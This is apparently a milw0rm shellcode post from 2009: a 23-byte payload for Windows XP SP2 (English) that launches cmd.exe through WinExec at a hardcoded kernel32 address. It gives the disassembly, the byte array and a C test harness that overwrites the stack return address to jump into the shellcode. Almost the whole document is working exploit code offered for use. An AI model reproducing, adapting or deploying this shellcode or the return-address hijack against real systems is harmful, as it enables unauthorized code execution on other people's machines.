win32xp sp2 En cmd.exe 23 bytes by h3m4n

VIEWS: 24 PAGES: 1

									                                            win32xp sp2 En cmd.exe 23 bytes                           Page 1/1
  1     /*
  2     win32/xp sp2 (En) cmd.exe 23 bytes
  3     Author : Mountassif Moad
  4     A.K.A : Stack
  5     Description : It’s a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En
  6
  7     get the following if we disassemle this code compiled with olly debugger
  8
  9     00402000 > 8BEC                       MOV EBP,ESP
  10    00402002 . 68 65786520                PUSH 20657865
  11    00402007 . 68 636D642E                PUSH 2E646D63
  12    0040200C . 8D45 F8                    LEA EAX,DWORD PTR SS:[EBP−8]
  13    0040200F . 50                         PUSH EAX
  14    00402010 . B8 8D15867C                MOV EAX,kernel32.WinExec
  15    00402015 . FFD0                       CALL EAX
  16    */
  17    #include <stdio.h>
  18    unsigned char shellcode[] =
  19                                   "\x8b\xec\x68\x65\x78\x65"
  20                                   "\x20\x68\x63\x6d\x64\x2e"
  21                                   "\x8d\x45\xf8\x50\xb8\x8D"
  22                                   "\x15\x86\x7C\xff\xd0";
  23    int main ()
  24    {
  25    int *ret;
  26    ret=(int *)&ret+2;
  27    printf("Shellcode Length is : %d\n",strlen(shellcode));
  28    (*ret)=(int)shellcode;
  29    return 0;
  30    }
  31
  32    // milw0rm.com [2009−07−17]




Stack                                                                                                 07/17/2009

								
To top